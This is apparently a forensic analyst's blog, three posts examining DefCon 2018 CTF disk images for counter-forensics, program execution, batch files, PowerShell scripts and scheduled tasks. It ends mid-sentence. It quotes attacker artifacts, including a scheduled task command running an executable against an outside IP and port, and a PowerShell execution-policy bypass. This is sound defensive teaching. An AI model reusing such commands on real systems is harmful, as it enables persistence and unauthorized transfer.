Tuesday, May 21, 2019

DefCon 2018 CTF File Server Take-Aways

In my last post, I shared some findings with respect to analyzing an image for anti- or counter-forensics techniques, which was part of the DefCon 2018 CTF.  Working on the analysis for the question I pursued, writing it up, and reflecting on it afterwards really brought out a number of what I consider important take-aways that apply to DFIR analysis.

Version
The Windows version matters.  The first DefCon 2018 CTF image I looked at was Windows Server 2016, and the file server image was Windows Server 2008 R2.  Each had some artifacts that the other didn't.  For example, the file server image had a SysCache.hve file, and the HR server didn't.

Both of the images that I've looked at so far from the CTF were of Windows server systems, and by default, application prefetching is not enabled on server editions.

Something else to consider is, was the system 32- or 64-bit?  This is an important factor, as some artifacts associated with 32-bit applications will be found in a different location on a 64-bit system.

The version of Windows you're working with is very important, as it tells you what should and should not be available for analysis, and sort of sets the expectations.  Now, once you start digging in, things could change.  Someone could have enabled more detailed logging, or enabled application prefetching on a server edition of Windows; if that's the case, it's gravy.

This is also true for applications, as well as other operating systems.  Versions and family matter. 

Execution
A file existing on the system does not definitively mean it was executed; the same is true of GUI applications.  Just because a GUI application was launched by a user, does that mean that it was actually run, that the functionality available through the GUI was exercised?  That's the challenge with GUI applications, isn't it?  How do you tell when they're actually run, beyond just the GUI being opened?  Did the user select various options in the UI and then click "OK", or did they simply open the GUI and then close it?

Yeah, I get it...why open the application and launch the UI if you don't actually intend to run it?  We often think or say the same thing when it comes to data staging and exfiltration, don't we?  Why would an actor bother to stage an archive if they weren't going to exfil it somehow?  So, when we see data staged, we would assume (of course) that it was exfiltrated.  However, we may end up making that statement about exfiltration in the absence of any actual data to support it. What if the actor tried to exfil the archive, but failed? 

If you don't have the data available to clearly and definitively illustrate that something happened, say that.  It's better to do that, than it is to state that something occurred, only to find out later that it didn't.

Consider this...an application running on the system can be looked at as a variation of Locard's Exchange Principle; in this case, the two "objects" are the application and the eco-system in which it is executing.  In the case of an application that reportedly performs anti- or counter-forensics functions, one would expect "forensic artifacts" to be removed somehow; this would constitute the "material" exchanged between the two objects.  "Contact" would be the execution of the application, and in the case of a GUI application, specifically clicking on "Ok" once the appropriate settings have been selected.  In the case of the file server CTF question, the assumption in the analysis is that "forensic artifacts" were deleted.

Why does it matter that we determine if the executable was actually launched, or if the functionality within the GUI tool was actually launched by the user?  Isn't it enough to simply say that the file exists on the system, assume that it had been run, and leave it at that?  We have to remember that as an expert, our findings are going to be used by someone to make a decision, or are going to impact someone.  If you're an IR consultant, it's likely that your findings will be used to make critical business decisions; i.e., what resources to employ, or possibly even external notification mandated by compliance regulations or even legislation.  I'm not even going to mention the legal/law enforcement perspective on this, as there are plenty of other folks out there who can speak authoritatively on that topic.  However, the point remains the same; what you state in your findings is going to impact someone.

Something else to consider is that throughout my time in the industry, I've seen more than a few times when a customer has contacted my team, not to perform DFIR work, but rather to review the DFIR work done by others.  In one instance, a teammate was asked by the client, "what questions would you ask?"  He was given the report produced by the other team, and went through it with a fine-tooth comb. I'm also aware of other instances where a customer has provided the same data to two different consultants, and compared the reports.  I can't say that this has happened often, but it has happened.  I've also been in situations where the customer has hired two different consulting companies, and shared the reports they (the customer) received with the other company.

Micro-Timelines and Overlays
One thing that was clear to me in both of the posts regarding the DefCon CTF images was the value and utility of micro-timelines.  Full timelines of system activity are very valuable, as well, because they serve to provide a significant amount of context around system activity at some point in time.  However, full system timelines are also very noisy, because Windows systems are very noisy.  As we saw in the last blog post, there was a Windows update being installed around the same time that "forensic artifacts" were being deleted.  This sort of circumstance can create confusion, and lead to the misinterpretation of data. 

However, by using micro-timelines, we can focus on specific sets of artifacts and start building out a skeleton analysis.  We can then use that skeleton as an overlay, and pivot into other micro-timelines, as well as into the full timeline.  Timeline analysis is an iterative process, adding and removing layers as the picture comes more into focus. 

This process can be especially valuable when dealing with activity that does not occur in an immediately sequential manner.  In my last blog post, the user launched an application, and then enabled and launched some modicum of the application's functionality.  This occurred in a straightforward fashion, albeit with other system activity (i.e., Windows update) occurring around the same time.  But what if that hadn't been the case?  What if the activity had been dispersed over days or weeks?  What if the user had used RegEdit to delete some of the forensic artifacts, and had done a few at a time?  What if the user had also performed online searches for tips on how to remove indications of activity, and then those artifacts were impacted, but over a period of days?  Having mini- and micro-timelines to develop overlays and use as pivot points would make the analysis so much easier and more efficient than scrolling through a full system timeline.

Deep Knowledge
Something that working and reflecting on my previous post brought to mind is that deep knowledge has considerable value.  By that, I mean deep knowledge not only of data structures, but also of the context of the available data.

Back when I was performing PCI investigations (long ago, in a galaxy far, far away...), one of the analysts on our team followed our standard process for running searches for credit card numbers (CCNs) across the images in their case.  We had a standardized process for many of the functions associated with PCI investigations due not only to what was mandated for the investigations, but the time frame in which the information had to be provided, as well.  By having standardized, repeatable processes, no one had to figure out what steps to take, or what to do next.  In one instance, the search resulted in CCNs being found "in" the Software hive.  Closer examination revealed that the CCNs were not value names, nor were they stored in value data; rather, they were located in unallocated space within the hive file, part of sectors added to the logical file as it "grew".  Apparently, the bad guy had run tools to collect CCNs into a text file, and then at one point in their process, deleted that text file.  Those sectors that contained the data were added to the Software hive as it grew in size.
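The core of that kind of search is simple enough to sketch: scan the raw bytes of a file (including slack and unallocated space) for digit runs of plausible CCN length, and weed out false positives with the Luhn check.  This is a minimal illustration, not the process we actually used; the test numbers below are the standard publicly documented ones.

```python
import re

def luhn_ok(num: str) -> bool:
    """Return True if the digit string passes the Luhn check."""
    total = 0
    for i, ch in enumerate(reversed(num)):
        d = int(ch)
        if i % 2 == 1:      # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def scan_for_ccns(data: bytes):
    """Yield (offset, candidate) pairs for 15- or 16-digit runs that pass Luhn."""
    for m in re.finditer(rb"(?<!\d)\d{15,16}(?!\d)", data):
        s = m.group().decode("ascii")
        if luhn_ok(s):
            yield m.start(), s

# Example against an in-memory buffer; in practice, data would be the raw
# bytes of the hive file, read straight off the image.
buf = b"...4111111111111111;5500005555555559..."
for off, ccn in scan_for_ccns(buf):
    print(off, ccn)
```

A real process would also handle common delimiters (dashes, spaces) within the digit runs, which this sketch deliberately omits.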

Having the ability to investigate, discover, and understand this was critical, as it had to be reported to Visa (Visa ran the PCI Council at the time) and there were strong indications that someone at Visa actually read the reports that were sent in...often, in great detail.  In fact, I have no doubt in my mind that there were other DFIR analysts who reviewed the reports, as well.  As such, being able to tie our findings to data in a reproducible manner was absolutely critical.  Actually, it should always be paramount, and foremost on your mind.

MITRE ATT&CK
One of the aspects of the MITRE ATT&CK framework that I've been considering for some time now is something of a reverse mapping for DFIR. What I mean by this is that right now, using the DefCon 2018 CTF file server image, we can map the activity from the question of interest (counter-forensics) to the Defense Evasion tactic, and then to the Indicator Removal From Host technique.  From there, we might take things a step further and add the findings from my last blog post as "observables"; that is, the user's use of the PrivaZer application led to specific "forensic artifacts" being deleted, which included artifacts such as the UserAssist value name found to have been deleted, the "empty" keys we saw, etc.

From there, we can then say that in order to identify those observables for the technique, we would want to look for the artifacts, or look in the locations, identified in the blog post.  This would be a reverse mapping, going from the artifacts back to the tactic. 

Let's say that you were examining an instance of data exfiltration, one that you found had occurred through the use of a bitsadmin 'upload' job.  Within the Exfiltration tactic, the use of bitsadmin.exe (or PowerShell) to create an 'upload' job might be tagged with the Automated Exfiltration or the Scheduled Transfer technique (or both), depending upon how the job is created.  The observable would be the command line (if EDR monitoring was in place) used to set up the job, or in the case of DFIR analysis, a series of records in the BitsAdmin Client Event Log.

Reversing this mapping, we know that one way to identify either of the two techniques would be to look in the BitsAdmin Client Event Log.  You might also include web server logs as a DFIR artifact that might help you definitively identify another aspect of data exfiltration.

In this way, we can extend our usual mapping from tactic to technique, adding "observables" and data sources, which then allows us to do a reverse mapping back to the tactic.  Sharing this across the DFIR team means that now analysts don't have to have had the experience of investigating a case of data exfiltration in order to know what to look for.
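In its simplest form, a shared reverse mapping could be nothing more than a lookup table from artifact/data source to technique, reversible in either direction.  The structure below is purely illustrative (the technique names follow ATT&CK, but the mapping entries are examples from this post, not a complete catalog):

```python
# Hypothetical shared lookup: DFIR artifact/data source -> ATT&CK technique(s).
REVERSE_MAP = {
    "BitsAdmin Client Event Log": ["Automated Exfiltration", "Scheduled Transfer"],
    "Web server logs": ["Exfiltration Over Web Service"],
    "UserAssist (deleted values)": ["Indicator Removal From Host"],
}

def artifacts_for(technique: str):
    """Reverse the mapping: which artifacts help identify a given technique?"""
    return sorted(a for a, ts in REVERSE_MAP.items() if technique in ts)

print(artifacts_for("Scheduled Transfer"))
```

The point isn't the code, it's that the mapping is data; once it's written down, any analyst on the team can query it in either direction without having worked that type of case before.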

Saturday, May 18, 2019

DefCon 2018 File Server

After engaging with the first image from the DefCon 2018 CTF, I thought it would be fun, and instructive, to take a look at the second image in the CTF, the File Server.

As before, not having signed up for the CTF itself, I found the questions associated with the image at the following sites:
HackStreetBoys
InfoSecurityGeek
Caffeinated4n6

One of the CTF questions that caught my attention was, What tool was used to delete forensic artifacts?  I've long been interested in two aspects of DFIR work that are directly associated with that question; anti- (or counter-) forensics, and what something looks like in the data (i.e., how is the behavior represented in the data?).

I found the answers to the question interesting.  The HackStreetBoys response referenced the output of the itempos.pl plugin, which listed the contents of the mpowers user desktop.  A reference to a program was found, one that was determined to be used for counter-forensics purposes, and that program was the response to the CTF question.  The other two responses referenced the UserAssist data; similarly, a program was found, identified via a Google search as an anti-forensics tool, and that was the answer.

However, beyond that, there was little in the way of verification that the program had actually been used to perform the specified task.  This is not to say that any analysis was incorrect; in the publicly available write-ups I reviewed, the answers to this question were reasonable guesses based on some modicum of the available data.

We know that the system was running Windows 2008 R2, and that tells us a good bit in and of itself.  For example, being a server version of Windows, application prefetching is not enabled by default, something we can easily verify both via the Registry, as well as via visual inspection of the image.  Something else that the version information tells us is that we won't have access to other artifacts associated with program execution, such as the contents of the BAM subkeys.  Further, there are other artifact differences with respect to the first image in the CTF; for example, the File Server image contains a SysCache.hve file, but not an AmCache.hve file.
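As an aside, the Registry check for prefetching comes down to the EnablePrefetcher value beneath HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters.  A small helper to interpret the DWORD, per its documented meanings (the helper itself is just a convenience sketch):

```python
def prefetch_status(enable_prefetcher: int) -> str:
    """Interpret the EnablePrefetcher DWORD from
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\
    Memory Management\\PrefetchParameters."""
    return {
        0: "prefetching disabled",
        1: "application launch prefetching only",
        2: "boot prefetching only",
        3: "application launch and boot prefetching",
    }.get(enable_prefetcher, "unknown")

print(prefetch_status(3))
```

On a server edition you'd typically expect to see application launch prefetching off; pairing the value with a visual check of the Windows\Prefetch folder confirms it.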

As such, the InfoSecurityGeek and Caffeinated4n6 blogs focused on the UserAssist data, and rightly so.  If you look closely at the Registry Explorer screen capture in the InfoSecurityGeek blog, you'll see that the identified value in the UserAssist data does not have a time stamp associated with it.  I've seen this happen, where the value data in the Registry either does not contain the time stamp associated with when the user launched the program, or the data itself is all zeros.

As a bit of a side note...and this is more of a personal/professional preference...I tend to prefer not to hang a finding on a single data point.  What I try to do is find multiple data points, understanding the context of each, that help build out the story of what happened.  For example, the fact that a program file existed on a system does not directly correlate to the fact that it was executed or launched.  Similarly, the fact that a GUI program was launched does not definitively state that it had been run.  I can open RegEdit and browse the Registry (or not) and then close it, but that does not definitively demonstrate that I changed anything in the Registry through the use of RegEdit.

From reviewing all three blog posts, we know that a file exists on the mpowers user desktop that, based on Google searches, is capable of taking anti- or counter-forensics actions (i.e., deleting forensic artifacts).  We also know that it is a GUI program, and that indications are that the user launched the GUI.  But what we don't know is, was the program actually run, in order to "delete forensic artifacts"?

Or do we?

Based on the question, the assumption is that forensic artifacts had been deleted, and as such, would not be found via our 'normal' processes.  This is illustrated by the fact that a good bit (albeit not all) of the data we'd normally look to with regard to user activity appears to have been removed; the RecentDocs key for the user isn't populated, there are no visible LNK files in the user's Recent folder, and there are only two JumpLists in the user's AutomaticDestinations folder.  Not definitive, but it's something.

So, my approach was to look to deleted keys and values within the user's NTUSER.DAT hive. One of the values found was:

P:\Hfref\zcbjref\Qrfxgbc\CevinMre.rkr

Knowing that the value names are Rot-13 encoded, that entry decodes to:

C:\Users\mpowers\Desktop\PrivaZer.exe
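The decoding is trivial to reproduce; Rot-13 only shifts alphabetic characters, so the drive letter, path separators, and extension dots pass through untouched:

```python
import codecs

# UserAssist value names are Rot-13 encoded
value_name = r"P:\Hfref\zcbjref\Qrfxgbc\CevinMre.rkr"
print(codecs.decode(value_name, "rot_13"))
# → C:\Users\mpowers\Desktop\PrivaZer.exe
```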

Tracking the value data based on the offset listed in the value node structure, and then parsing the data at that location, here is what I found:

00 00 00 00 01 00 00 00 02 00 00 00 E4 6B 01 00   .............k..
00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF   ................
00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF   ................
00 00 80 BF 00 00 80 BF FF FF FF FF 30 DA 50 46   ............0.PF
8C 2E D4 01 00 00 00 00                           ........

As you can see, there are 8 bytes toward the end of the data that are a FILETIME object. With a little scripting-action, I was able to extract the data and translate the time stamp into something human-readable:

Tue Aug  7 20:21:51 2018
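The math behind that translation amounts to reading the 8 bytes as a little-endian 64-bit count of 100-nanosecond intervals since January 1, 1601 (UTC).  A minimal sketch (not the RegRipper code itself, just the same conversion in Python):

```python
from datetime import datetime, timedelta, timezone

def filetime_to_dt(ft: int) -> datetime:
    """Convert a Windows FILETIME (100-ns intervals since 1601-01-01 UTC)."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

# The 8 bytes of the FILETIME from the value data shown above, little-endian
raw = bytes.fromhex("30DA50468C2ED401")
print(filetime_to_dt(int.from_bytes(raw, "little")))
```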

The process of getting the above time stamp involved getting the offset to the data from the value structure, locating the data in the binary contents of the NTUSER.DAT file (via a hex editor) and then writing (well, not writing so much as copy-paste, right from the RegRipper userassist.pl plugin...) a small bit of code to go in and extract and process the data. Remember, the "active" value within the hive file contained data for which the time stamp was all zeros; in this case, we now  have a time stamp value that we can work with.  Within a micro-timeline of user activity, we see the following:

Tue Aug  7 20:24:14 2018 Z
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/StreamMRU 
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/ComDlg32/CIDSizeMRU 

Tue Aug  7 20:24:13 2018 Z
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/ComDlg32/OpenSavePidlMRU 
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/ComDlg32/LastVisitedPidlMRU 
  REG    mpowers - M... HKCU/mpowers/Software/Microsoft/Windows/CurrentVersion/Explorer/RecentDocs 

So, we see a number of Registry keys modified, and from our use of the appropriate RegRipper plugins (as well as a viewer, to verify) we can see that all of these keys are empty; that is, none is populated with any values.  This may be the "delete forensic artifacts" that we were looking for...

Pivoting into a more comprehensive timeline of system activity based on the time stamp, we see the following activity:

Tue Aug  7 20:23:53 2018 Z
  FILE      - MA.B [43680] C:\Users\mpowers\AppData\Local\Temp\000\717000000000000000000_p.0x0

Tue Aug  7 20:22:18 2018 Z
  FILE      - M... [221] C:\Users\mpowers\AppData\Local\Temp\000\new_version.txt

Tue Aug  7 20:22:17 2018 Z
  FILE      - .A.B [221] C:\Users\mpowers\AppData\Local\Temp\000\new_version.txt

Tue Aug  7 20:22:15 2018 Z
  FILE       - MA.. [4096] C:\Users\mpowers\Downloads\$I30
  FILE       - MA.. [56] C:\Users\mpowers\Downloads\


Tue Aug  7 20:21:56 2018 Z
  FILE       - .A.B [314] C:\Users\mpowers\AppData\Local\Temp\000\data.ini

Tue Aug  7 20:21:55 2018 Z
  FILE       - MA.B [3096] C:\$Extend\$RmMetadata\$Txf\00000000000060CC\
  FILE       - MA.B [870278] C:\Users\mpowers\AppData\Local\Temp\000\sqlite3.dll
  FILE       - MA.B [56] C:\$Extend\$RmMetadata\$Txf\00000000000060CC\$TXF_DATA
  FILE      - ...B [4096] C:\Users\mpowers\AppData\Local\Temp\000\$I30
  FILE      - ...B [48] C:\Users\mpowers\AppData\Local\Temp\000\

Following the activity illustrated above, we see a significant series of events within the timeline that may be indicative of artifacts being "cleaned up"; specifically, folders and Registry keys are being modified (presumably emptied), and files deleted.

Something else that is very instructive from the system timeline is that while the apparent deletion activity is going on, there is also an update being applied.  This is a great example demonstrating how verbose Windows systems can be, particularly when it comes to creating events on the systems.  When reviewing the timeline, I noticed that there were more than a few files being created, rather than modified, that appeared to be associated with a Windows update.  There were also some Registry keys that were being "modified".  I then checked the following log file:

C:\Windows\Logs\CBS\DeepClean.log

The entries in this log file indicated not only that there were updates being applied, but also which updates were applied, and which were skipped.  This is a great illustration of why micro-timelines, pivot points, and overlays are so valuable in timeline analysis; throwing everything into a single file or view would lead to a massive amount of data, and an analyst might miss important artifacts, or "signal", buried amongst the "noise".

Finally, there was a whole swath of events similar to the following:

 - MA.B [0] \[orphan]\00000000000000000000000000000000552.0x0

After all of that activity, we see the following:

Tue Aug  7 20:31:36 2018 Z
  FILE      - M... [314] C:\Users\mpowers\AppData\Local\Temp\000\data.ini

Tue Aug  7 20:30:59 2018 Z
  FILE      - M... [0] C:\Users\mpowers\Desktop\PrivaZer registry backups\WIN-M5327EF98B9\00000000000000.0x0
  FILE      - MA.. [48] C:\Users\mpowers\Desktop\PrivaZer registry backups\WIN-M5327EF98B9\
  REG       - M... HKLM/Software/Microsoft/Windows/CurrentVersion/RunOnce 
  FILE      - M... [0] C:\Users\mpowers\Desktop\PrivaZer registry backups\WIN-M5327EF98B9\000000000000000000.0x0

We see that the data.ini file associated with the PrivaZer tool was last modified in the timeline extract above.  The final 2 lines in the file are:

[last_erase_date2]
717=131781474597770000

That long string of numbers could be a FILETIME object; assuming it is and converting it to something human-readable, we get:

2018-08-07T20:30:59+00:00

The time stamp is stored in a 100-nanosecond-epoch format, and what it seems to give us is the last date on which the program was run.  What's interesting is that within the timeline of system activity, there doesn't seem to be any more activity following that time stamp that is associated with mass deletion or counter-forensics activity, likely as a result of the PrivaZer program.  There is a significant amount of failed login activity that picks up shortly thereafter within the overall timeline; this activity could be seen as counter-forensics in nature.

Why is this important?  Well, about 3 minutes prior to the above activity kicking off, there were two attempts to install CCleaner on the system. I say "attempts", because the timeline contains several application error or crash events related to the following file:

C:\Users\mpowers\Downloads\ccsetup544pro.exe

Following these crashes, there does not appear to be any timeline data indicative of the program being installed (i.e., files and Registry keys being created or updated, etc.), nor does there seem to be any indication of the use of CCleaner.

By correlating the time that the PrivaZer program was launched to additional events that occurred on the system, we now have much more solid information that the program was used to "delete forensic artifacts".  This is important because some of the deleted artifacts could have been removed with native tools such as RegEdit or reg.exe; having an apparent privacy tool on the user desktop does not necessarily mean that it was used to perform the actions in question.  Yes, it is a logical guess, based on the data.  However, by looking a bit closer at the data, we can see further activity associated with program execution.

Conclusion
Again, my reason for sharing this isn't to point out anything with anyone else's analysis...not at all.  But something I've seen repeatedly during my time in the industry has been statements made regarding findings that are not tied to data.  One example of this is the question of data exfiltration; often exfiltration is assumed when data has been staged and archived.  After all, why would an actor go through the work of collecting, staging, and archiving data if they weren't going to exfiltrate it?  But why assume data exfiltration when the data needed to illustrate it (i.e., packet captures, netflow data, logs, etc.) isn't available; why not simply state that the data was not available?

That's what I attempted to illustrate here.  Yes, there is a file on the user's desktop called "PrivaZer.exe", and yes, per Google searches, this program can be used to "delete forensic artifacts".  But how do we know that it was, in fact, used to "delete forensic artifacts", if we don't look at the data to see if there were indications that the program was actually run?  Think about it...RegEdit could have been used to "delete forensic artifacts", specifically those within the Registry. The user could have used RegEdit to delete the contents of the keys themselves.

However, this activity would have left artifacts of its own.  RegEdit is an "applet", in MS terms, and one of the artifacts retrieved by the RegRipper applets.pl plugin is the last Registry key that had focus when RegEdit was closed.  Not only was the appropriate key (i.e., the RegEdit subkey beneath the Applets key) not present within the 'active' Registry, I also found no indication of the key having been deleted.

Tuesday, May 14, 2019

DefCon 2018 CTF Plus

I don't often engage in CTFs. Yes, they're fun, but even when an effort is made to have various aspects or stages be representative of real-world use cases, overall, they don't tend to hit the mark.  I've done some of the various challenges, and once or twice been part of the test team for CTF challenges.

Not too long ago, I ran across David Cowen's blog post for the DefCon 2018 CTF.  I wanted to run through at least the first image, but I didn't want to sign up for the challenge...I was just hoping to find the scenario or questions.  Phill pointed me to Google, and I found a couple of sites that included the individual questions, along with responses (HackStreetBoys, InfoSecurityGeek, Caffeinated4n6).

If you look at the questions answered at each of the linked sites, you'll see that there are some commonalities in answering the individual questions in the CTF, and in other cases, there are a few differences.  One example of differences is for the question, What was the name of the batch file saved by mpowers? The HackStreetBoys opted to use the MFT, while Caffeinated4n6 went with Registry Explorer.  I chose to use the RegRipper comdlg32.pl plugin, and we all arrived at the same answer.  This is not to say that one method was better than another, as we all got to the same correct response.

However, IRL, this isn't likely where things will stop.  In my experience, there haven't been many (read: none) customers who have asked me to simply determine the batch file that a user saved, and leave it at that; with real-world DFIR, there was always something more to it.  As such, I decided to use the question (the one about the batch file being written) as a starting point, and build out an analysis approach that was a bit closer to the sort of thing you would see as a DFIR consultant, or even as an analyst in an FTE position within a company.

We can see in a timeline of overall system activity when the batch file was created:

Mon Jul 23 16:15:06 2018 Z
  FILE    - .A.B [169] C:\Production\update_app.bat

We can also see when the file was last modified:

Mon Jul 23 17:35:35 2018 Z
  FILE    - MA.. [48] C:\Users\mpowers\AppData\Roaming\Notepad++\backup\
  FILE    - M... [169] C:\Production\update_app.bat

Taking a look at the MFT record for the file, we can confirm this:

166116     FILE Seq: 4    Links: 2   
[FILE],[BASE RECORD]
.\Production\update_app.bat
    M: Mon Jul 23 17:35:35 2018 Z
    A: Mon Jul 23 16:15:06 2018 Z
    C: Mon Jul 23 17:35:35 2018 Z
    B: Mon Jul 23 16:15:06 2018 Z
  FN: UPDATE~1.BAT  Parent Ref: 165091/2
  Namespace: 2
    M: Mon Jul 23 16:15:57 2018 Z
    A: Mon Jul 23 16:15:06 2018 Z
    C: Mon Jul 23 16:15:57 2018 Z
    B: Mon Jul 23 16:15:06 2018 Z
  FN: update_app.bat  Parent Ref: 165091/2
  Namespace: 1
    M: Mon Jul 23 16:15:57 2018 Z
    A: Mon Jul 23 16:15:06 2018 Z
    C: Mon Jul 23 16:15:57 2018 Z
    B: Mon Jul 23 16:15:06 2018 Z
[$DATA Attribute]
[RESIDENT]
File Size = 169 bytes

A couple of other bits of information from the MFT record...it doesn't appear as if the file was time stomped, and the file is resident within the record.  This isn't surprising, given the size, but it would have an effect on our ability to recover indications of the file, should it be deleted.
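The time-stomping check in that paragraph rests on comparing the $STANDARD_INFORMATION times against the $FILE_NAME times from the same record; $FN times are maintained by the kernel and are much harder for common tools to alter, so a $SI born date that predates the $FN born date is a classic red flag.  A rough sketch of the comparison (the function and field names are illustrative, not tied to any particular MFT parser):

```python
from datetime import datetime, timezone

def looks_time_stomped(si_born: datetime, fn_born: datetime) -> bool:
    """Flag records where the $SI creation time predates the $FN creation
    time, a common indicator of backdated $SI timestamps."""
    return si_born < fn_born

# The B (born) dates from the update_app.bat record above
si_b = datetime(2018, 7, 23, 16, 15, 6, tzinfo=timezone.utc)
fn_b = datetime(2018, 7, 23, 16, 15, 6, tzinfo=timezone.utc)
print(looks_time_stomped(si_b, fn_b))   # → False
```

This heuristic catches the common case (tools that rewrite $SI but not $FN); it won't catch an actor who stomped both sets of timestamps, which is why it's one data point among several, not a verdict.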

Creating a micro-timeline using the mpowers UserAssist, RecentApps, and RecentDocs Registry entries, and IE browser history, we can get a good bit of additional detail regarding just that user's activity.  Pivoting into that micro-timeline with the name of the batch file, we can see from the comdlg32.pl plugin the date/time when the batch file was accessed by the user:

Mon Jul 23 16:48:15 2018 Z  
  REG     mpowers - ComDlg32: OpenSavePidlMRU\bat - My Computer\C:\Production\update_app.bat

Continuing to search the micro-timeline for indications of the batch file, we see:

Mon Jul 23 17:35:53 2018 Z
  REG     mpowers - [Program Execution] UserAssist - C:\Production\update_app.bat (3)
  REG     mpowers - C:\Production\update_app.bat (3)

In short, not only do we see the file being created and saved, but we can see that the file was executed.  This is huge!  A batch file, or even malware, sitting on a system is harmless.  It doesn't do anything until it's launched or executed.  Viewing the contents of the batch file within FTK Imager, we can see that it includes two copy commands, each of which copies a file from a Z:\ volume to the C:\Production folder.  Incorporating the user-specific timeline information into an overall timeline of system activity as an 'overlay', or using it as a pivot point into the system timeline, we can see the effects that the batch file being executed has upon its overall eco-system (the server file system, Registry, Windows Event Log, etc.).

Using the contents of the batch file as a pivot point, we can see from the micro-timeline of user activity that the mpowers user accessed the Z:\ volume pretty extensively. But where does that volume come from?  Is it a USB device?  Checking the Software and System hives for indications of connected USB devices reveals that there isn't a great deal of information available to indicate the use of a USB device.  How about a mapped share?  Our micro-timeline reveals the following:

Mon Jul 23 16:01:14 2018 Z
  REG    mpowers - ShellBags - Desktop\My Computer\Z:\project_0x02\tcontinuous\dist

Mon Jul 23 16:00:53 2018 Z
  REG    mpowers - Map Network Drive MRU - \\74.118.139.11\M4Projects

While not directly conclusive, the timing of the above events is close enough that we may be able to reasonably tie the mapped folder to the Z:\ volume.

Further, we still have a good bit of information about the batch file itself.  Looking at the micro-timeline, and pivoting on the batch file name without the extension, we see references to update_app.ps and update_app.ps1, both apparently located (per the mpowers micro-timeline) in the C:\Production folder. However, viewing the image via FTK Imager, neither of those files appears in that folder.  Searching the overall timeline of system activity similarly provides no indication of the files.  These look like they may be PowerShell scripts, but again, we don't see them in the 'active' file system within the image.

Checking the contents of the mpowers ConsoleHost_history.txt file, we see the following:

cd C:\Production\
dir Z:\project_0x02\tcontinuous\dist\
dir Z:\project_0x02\tcontinuous\production\
copy Z:\project_0x02\tcontinuous\production\tcontinuous.exe C:\Production\
$PSVersionTable.PSVersion.toString()

Much like a .bash_history file on Linux systems, the ConsoleHost_history.txt file does not contain time stamps. However, it does provide some useful information, in this case indicating that there was some use of PowerShell by the user.  Knowing that, and knowing that PowerShell scripts were likely associated with the user, we can create a micro-timeline of PowerShell events, which requires only two commands (note that I've already extracted Windows Event Log files from the image):

wevtx.bat f:\defcon\files\*powershell*.evtx f:\defcon\files\ps_events.txt

...and...

parse -f f:\defcon\files\ps_events.txt > f:\defcon\files\ps_tln.txt

As a result of the commands, we have a good bit of information available to us from the Windows Event Logs, and it is much easier to go through than if we had a full timeline of all system activity.  For example, we can easily see clusters of PowerShell/600 events beginning at Mon Jul 23 16:27:51 2018 Z, which include the following:

HostApplication=Powershell.exe -ExecutionPolicy Bypass C:\Production\update_app.ps1

Ah, okay...so it appears that PowerShell was used to attempt to launch this file; our assumption that the .ps and .ps1 files were PowerShell scripts is in the process of being confirmed.  However, at the same time, we also see a PowerShell/300 (warning) event that states:

Could not find the drive 'Z:\'. The drive might not be ready or might not be mapped.

Hhhhmmm...for whatever reason, the script seems to have had issues, and possibly not worked.  This may be the reason why the user resorted to a batch file.
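The kind of filtering used to surface those PowerShell/600 "HostApplication" entries can be sketched in Python. Note that the five-field time|source|system|user|description layout and the sample lines below are assumptions for illustration, not output copied from the tools:

```python
# Sketch: pull PowerShell "HostApplication" entries from a
# pipe-delimited events file (five-field TLN-style layout assumed)
def host_application_events(lines):
    hits = []
    for line in lines:
        fields = line.rstrip("\n").split("|")
        # keep only well-formed lines whose description records a launch
        if len(fields) == 5 and "HostApplication=" in fields[4]:
            hits.append(fields[4])
    return hits

sample = [
    "1532363271|EVTX|FS01|mpowers|PowerShell/600;HostApplication="
    "Powershell.exe -ExecutionPolicy Bypass C:\\Production\\update_app.ps1",
    "1532363272|EVTX|FS01|-|PowerShell/300;Could not find the drive 'Z:\\'.",
]
print(host_application_events(sample))
```

The same pattern works for any event ID or keyword you want to pivot on; the point is that a micro-timeline is just a targeted filter over a larger events file.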

But wait...there's more...

Mon Jul 23 17:55:30 2018 Z
  REG    - M... HKLM/Software/ROOT/Microsoft/Windows NT/CurrentVersion/Schedule/TaskCache/Tree/Update App  
  FILE   - .A.B [3874] C:\Windows\System32\Tasks\Update App

From the above we can see that a Scheduled Task was created, and viewing the contents of the XML file, we can see that the task contains the command "C:\Production\update_app.bat".  Shortly thereafter, we see:

Mon Jul 23 17:57:17 2018 Z
  FILE   - .A.B [742400] C:\Production\tthrow.exe
  FILE   - .A.B [5425251] C:\Production\tcontinuous.exe

Okay, there are the files that were the targets of the 'copy' commands.  Shortly after these events in the timeline, we see:

Mon Jul 23 18:07:14 2018 Z
  FILE   - M... [474] C:\Users\mpowers\AppData\Roaming\Microsoft\Credentials\F03B2BF5CC26D5309225478FE717BB7E
  FILE   - M... [1806] C:\Windows\debug\PASSWD.LOG
  REG    - M... HKLM/Software/ROOT/Microsoft/Windows NT/CurrentVersion/Schedule/CredWom/S-1-5-21-2967420476-1305424719-3994513216-1000 
  FILE   - M... [3872] C:\Windows\System32\Tasks\Throw Taco

From the above, we can see that the "Throw Taco" Scheduled Task XML file was modified.  The XML contents of the "Throw Taco" Scheduled Task includes:

C:\Production\tcontinuous.exe
tthrow.exe 74.118.139.11:7420

This gives us some information with respect to our two mystery files, the relationship between them, and how they were used (i.e., one was an argument for the other, and they were run with SYSTEM-level privileges).  But what about the other entries in the timeline, at the same time?  The Registry key that points to "CredWom" includes the SID for the mpowers user, and the last entry in the passwd.log file reads:

07/23 11:07:14 Attempting password change server/domain 
WIN-29U41M70JCO for user mpowers

So, at this point, we haven't done actual malware RE on the two mystery files, but we do have a good deal of valuable information for an analyst.
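Since the task files under C:\Windows\System32\Tasks are plain XML, the embedded command line can be pulled out with a few lines of Python. The minimal XML body below is hand-built for illustration (real task files carry many more elements), though the schema namespace is the one Windows uses:

```python
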